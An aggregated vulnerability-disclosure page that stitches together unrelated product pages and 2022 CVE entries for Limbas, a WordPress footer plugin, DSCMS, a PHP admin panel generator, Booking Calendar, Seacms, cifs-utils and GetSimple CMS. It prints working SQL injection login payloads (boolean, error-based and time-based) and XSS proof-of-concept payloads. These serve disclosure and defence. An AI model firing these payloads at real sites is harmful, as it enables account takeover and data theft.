Limbas 4.3.36.1319 is vulnerable to Cross Site Scripting (XSS).

Like Access, from basic features such as table management, form and report generator as well as charting and workflow features it can be dynamically modeled with one another to any product solution. Limbas is based on PHP.

**Features**

*   quickly create webbased applications
*   completly webbased for allmost all browsers
*   easy to use graphical userinterface
*   graphical wizzards for building views, forms and reports
*   support of many databases like maxdb, postgresql, ingres, mssql
*   Administration tools for backup and export, rulemanagement, triggers and more
*   integrated filemanager with DMS functionality
*   integrated ajax-based calendar
*   reminder functionality with sending reminders to users or groups
*   recursiv versioning of datasets and files
*   support SOAP and WEBDAV interfaces
*   YII-Framework connection class for limbas

**License**GNU General Public License version 2.0 (GPLv2)

Other Useful Business Software

Discover HPCC Systems - the truly open source big data solution that allows you to quickly process, analyze and understand large data sets, even data stored in massive, mixed-schema data lakes. Designed by data scientists, HPCC systems is a complete integrated solution from data ingestion and data processing to data delivery. The free online introductory courses and a robust developer community allow you to get started quickly.

**User Ratings**

5.0 out of 5 stars

★★★★★

★★★★

★★★

★★

★

ease 1 of 5 2 of 5 3 of 5 4 of 5 5 of 5 0 / 5

features 1 of 5 2 of 5 3 of 5 4 of 5 5 of 5 0 / 5

design 1 of 5 2 of 5 3 of 5 4 of 5 5 of 5 0 / 5

support 1 of 5 2 of 5 3 of 5 4 of 5 5 of 5 0 / 5

**User Reviews**

*   All
*   ★★★★★
*   ★★★★
*   ★★★
*   ★★
*   ★

*   1 user found this review helpful.
    
*   A powerful system very flexible and easy to handle. Using a browser to access LIMBAS gives you the possibility to work from any location and device. No license fees.
    
*   looks like the answer of my prayers :-)
    

Read more reviews >

**Additional Project Details**

**Languages**French, English, German

**Intended Audience**Information Technology, Developers, End Users/Desktop

**User Interface**Web-based

**Programming Language**PHP

**Database Environment**Other network-based DBMS, ODBC

**Registered**

2006-01-04

CVE-2022-28454: Limbas

Cross-Site Request Forgery (CSRF) leading to Cross-Site Scripting (XSS) in Shea Bunge's Footer Text plugin <= 2.0.3 on WordPress.

This plugin **hasn’t been tested with the latest 3 major releases of WordPress**. It may no longer be maintained or supported and may have compatibility issues when used with more recent versions of WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Description**

Provides an interface in the dashboard, similar to the post edit screen, that allows you to easily change the text displayed in the footer on the front-end. After installing the plugin, add the footer_text() template tag to your footer.php theme template where you want the text to display. For more options, see the FAQ.

You can use these shortcodes in the footer text editor:

*   [last_modified] the date that the current page was last modified on
*   [page_link] the full permalink of the current page, formatted. The content wrapped in this shortcode will be used as the link text
*   [year] the current year eg: 2013

Visit the plugin homepage, or contribute to its development at GitHub.

**Screenshots**

**Installation**

1.  Upload the footer-text directory to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  Visit _Appearance > Footer Text_ to write your awesome footer text
4.  Place the footer_text() template tag somewhere in your theme where you want the text displayed
5.  Visit site. Observe.

**FAQ**

**How can I display the footer text in my theme?**

You can use the footer_text() function to display the footer text, or the get_footer_text() function to return it for use in PHP. These template tags should generally be used in the footer.php file of your theme.

The footer_text() function outputs the formatted footer text and accepts three parameters: $before, $after and $default. $before will be outputted _before_ the text, $after will be outputted _after_ the text, and $default will be used instead of the text is none is set. If no text is set $default is empty, nothing will be displayed.

The get_footer_text() function returns the formatted footer text and accepts one parameter: $default, which will be returned if no text is set.

If the plugin isn’t active, the template tag will result in an error. To solve this, you can use an action hook instead:

    do_action( 'footer_text', $default, $before, $after );
    

This works the same as calling the footer_text() function, and any of the three arguments can be omitted.

**Reviews**

Erik September 3, 2016

It still does the trick, even in 4.4!

mojen September 3, 2016

Does exactly what it says on the tin. It works with Insert Pages shortcodes as well. Thank you!

Read all 6 reviews

**Contributors & Developers**

“Footer Text” is open source software. The following people have contributed to this plugin.

Contributors

*    Shea Bunge

**Changelog****2.0.3**

*   Added a message when the text is updated.

**2.0.2**

*   Use a <h1> heading on administration pages

**2.0.1**

*   Update screenshots for WordPress 3.9
*   Add braces to one-line conditionals

**2.0.0**

*   Delete footer text from database on uninstall
*   Added an action as an alternate way to display footer text
*   Restructured code
*   Fixed \[page\_link\] shortcode
*   Added custom ‘edit\_footer\_text’ capability
*   Added support for translations

**1.0.0**

*   Initial release

CVE-2022-27860: Footer Text

Home Clean Service System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Home Clean Service System v1.0 - 2022 SQLi## Author: nu11secur1ty## Date: 04.27.2022## Vendor: https://www.sourcecodester.com/users/acetech## Software: https://www.sourcecodester.com/php/15293/home-clean-service-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System## Description:The `password` parameter appears to be vulnerable to SQL injection attacks.A single quote was submitted in the password parameter, and a databaseerror message was returned.Two single quotes were then submitted and the error message disappeared.The attacker can take administrator account control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: MULTIPART email ((custom) POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="email"uufQHiPr@namaikatiputkata.net' OR NOT 6564=6564-- aWQp------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="password"t8I!x2y!H3'------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="login"------WebKitFormBoundary8kMPLwTOJeesgEBx--    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="email"uufQHiPr@namaikatiputkata.net' AND (SELECT 6279 FROM(SELECTCOUNT(*),CONCAT(0x7176716271,(SELECT(ELT(6279=6279,1))),0x716a767871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- LSfT------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="password"t8I!x2y!H3'------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="login"------WebKitFormBoundary8kMPLwTOJeesgEBx--    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="email"uufQHiPr@namaikatiputkata.net' AND (SELECT 4830 FROM(SELECT(SLEEP(5)))kgBM)-- GxTm------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="password"t8I!x2y!H3'------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="login"------WebKitFormBoundary8kMPLwTOJeesgEBx-----```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System)## Proof and Exploit:[href](https://streamable.com/l107o6)

Home Clean Service System 1.0 SQL Injection

DSCMS v3.0 was discovered to contain an arbitrary file deletion vulnerability via /controller/Adv.php.

**Arbitrary file deletion vulnerability**

**评论 (0)**

原值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120303\_a26bb592\_9830429.jpeg "112.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

新值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124119\_947e90b5\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

原值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124119\_947e90b5\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

新值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124214\_0a757e11\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

原值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124214\_0a757e11\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

新值

Repair

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124324\_667a2c8b\_9830429.jpeg "xiufu.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124214\_0a757e11\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

原值

Repair

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124324\_667a2c8b\_9830429.jpeg "xiufu.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124214\_0a757e11\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

新值

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120106\_6dbf5607\_9830429.jpeg "111.jpg")

Create a test php file

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124214\_0a757e11\_9830429.jpeg "333.jpg")

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120145\_7eb05daa\_9830429.jpeg "555.jpg")

Payload

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120338\_21e5893e\_9830429.jpeg "777.jpg")

Delete success

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/120438\_ac42c3cf\_9830429.jpeg "999.jpg")

Repair

!\[输入图片说明\](https://images.gitee.com/uploads/images/2022/0327/124324\_667a2c8b\_9830429.jpeg "xiufu.jpg")

登录 后才可以发表评论

CVE-2022-28114: Arbitrary file deletion vulnerability · Issue #I4ZRMW · 德尚网络/DSCMS_open - Gitee.com

A cross-site scripting (XSS) vulnerability in PHP MySQL Admin Panel Generator v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected at /edit-db.php.

Affected software : php-mysql-admin-panel-generator

Version : N/A

Type of vulnerability : XSS (Cross-Site Scripting)

Author : s7safe

Description:  
php-mysql-admin-panel-generator is susceptible to cross-site scripting attacks, allowing malicious users to inject code into web pages, and other users will be affected when viewing web pages .

login the system  

PoC :  
turn to http://192.168.146.130/generated/mysql2022-03-26\_02-49/edit-db.php?act=%22%3E%3CScRiPt%3Ealert(%22xss%22)%3C%2FsCrIpT%3E

payload:"><ScRiPt>alert("xss")<%2FsCrIpT>

Successful

Reason:  
Failure to filter or escape special characters leads to vulnerabilities

How to fix :  
escape special characters or filter it .

by s7safe

CVE-2022-28102: Cross-Site Scripting (XSS) - Security Issue  · Issue #19 · housamz/php-mysql-admin-panel-generator

WordPress Booking Calendar plugin versions 9.1 and below suffer from PHP object injection and insecure deserialization vulnerabilities.

    On April 18, 2022, the Wordfence Threat Intelligence team initiated the disclosure process for an Object Injection vulnerability in the Booking Calendar plugin for WordPress, which has over 60,000 installations.We received a response the same day and sent over our full disclosure early the next day, on April 19, 2022. A patched version of the plugin, 9.1.1, was released on April 21, 2022.We released a firewall rule to protect Wordfence Premium,  Wordfence Care, and Wordfence Response customers on April 18, 2022. Sites still running the free version of Wordfence will receive the same protection on May 18, 2022.We recommend that all Wordfence users update to the patched version, 9.1.1, as soon as possible as this will entirely eliminate the vulnerability.Description: Insecure Deserialization/PHP Object InjectionAffected Plugin: Booking CalendarPlugin Slug: bookingPlugin Developer: wpdevelop, opluginsAffected Versions: <= 9.1CVE ID: CVE-2022-1463CVSS Score: 8.1(High)CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HResearcher/s: Ramuel GallFully Patched Version: 9.1.1The Booking Calendar plugin allows site owners to add a booking system to their site, which includes the ability to publish a flexible timeline showing existing bookings and openings using a shortcode, [bookingflextimeline].The flexible timeline includes the ability to configure viewing preferences and options when viewing the published timeline. Some of these options were passed in PHP’s serialized data format, and unserialized by the define_request_view_params_from_params function in core/timeline/v2/wpbc-class-timeline_v2.php.An attacker could control the serialized data via several methods:- If a timeline was published, an unauthenticated attacker could obtain the nonce required to send an AJAX request with the action set to WPBC_FLEXTIMELINE_NAV and a timeline_obj[options] parameter set to a serialized PHP object.- Any authenticated attacker could use the built-in parse-media-shortcode AJAX action to execute the [bookingflextimeline] shortcode, adding an options attribute in the shortcode set to a serialized PHP object. This would work even on sites without a published timeline.- An attacker with contributor-level privileges or above could also embed the [bookingflextimeline] shortcode containing a malicious options attribute into a post and execute it by previewing it, or obtain the WPBC_FLEXTIMELINE_NAV nonce by previewing the [bookingflextimeline] shortcode and then using method #1.Any time an attacker can control data that is unserialized by PHP, they can inject a PHP object with properties of their choice. If a “POP Chain” is also present, it can allow an attacker to execute arbitrary code, delete files, or otherwise destroy or gain control of a vulnerable website. Fortunately, no POP chain was present in the Booking plugin, so an attacker would require some luck as well as additional research in order to exploit this vulnerability. Nonetheless, POP chains appear in a number of popular software libraries, so many sites could still be exploited if another plugin using one of these libraries is installed.Despite the lack of a POP chain and complexity involved in exploitation, the potential consequences of a successful attack are so severe that Object Injection vulnerabilities still warrant a “High” CVSS score. We’ve written about Object Injection vulnerabilities in the past (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVpBSr3BkC5gW3zCRq11qNCJPW2qd3df4JnTTpN6klYVQ5js6JV3Zsc37CgG1_W4Cc2TH2cMdlnW5f7ykY58sLPNW4pvZXZ2RXFNBW7KbW7x7z0_PZVDPKzv1yW6N0W7v4Xbb94X562Vx_h734dKwtbW64FBwn4PkBrVW6K_MLr53zwDfW4VH96w95ZT3qW11tQ681xsy7DN1dXl29dh69DW4vpJ0h6nhGVSW5XzPFp40K1RFW5PCymh61jdV9W1WSKs76PKR7rV8vsw54MNkD5W1vSwjN3tdZZ0W6JnYnt1kphDLW5BMKJQ4R6zYYW41XMGF5lxxpWN8_KG5xf57l3VJ9Cpq8kNPCqN90_1c3m4f__W2WnhNh1YPPNGVXZkVx2fCwHNW218B8X4s27wRW8VQWWb9jbvCGVY7B375H-KWTW3DGsJC7yVVSRW2jTqcW3Y3VQ6W7jN8Sg7Y3H67V5dYPX7ZdWPjW74Cb_v3bWjCr3bzH1 ) if you’d like to find out more about how they work.TimelineApril 18, 2022 - We release a firewall rule to protect Wordfence Premium, Care, and Response customers. We initiate the disclosure process. The plugin developer verifies the contact method.April 19, 2022 - We send the full disclosure to the plugin developer.April 21, 2022 - A patched version of the Booking Calendar plugin, 9.1.1, is released.May 18, 2022 - The firewall rule becomes available to free Wordfence users.ConclusionIn today’s post, we covered an Object Injection vulnerability in the Booking Calendar plugin. Wordfence Premium, Wordfence Care, and Wordfence Response customers are fully protected from this vulnerability. Sites running the free version of Wordfence will receive the same protection on May 18, 2022, but have the option of updating the Booking calendar plugin to the patched version 9.1.1 to eliminate the risk immediately.If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

WordPress Booking Calendar 9.1 PHP Object Injection / Insecure Deserialization

Seacms v11.6 was discovered to contain a remote code execution (RCE) vulnerability via the component /admin/weixin.php.

CVE-2022-27336

In cifs-utils through 6.14, a stack-based buffer overflow when parsing the mount.cifs ip= command-line argument could lead to local attackers gaining root privileges.

CVE-2022-27239: Linux CIFS Utils and Samba - Free Knowledge Base

A vulnerability, which was classified as problematic, has been found in GetSimple CMS. Affected by this issue is the file /admin/edit.php of the Content Module. The manipulation of the argument post-content with an input like <script>alert(1)</script> leads to cross site scripting. The attack may be launched remotely but requires authentication. Expoit details have been disclosed within the advisory.

Tag

#php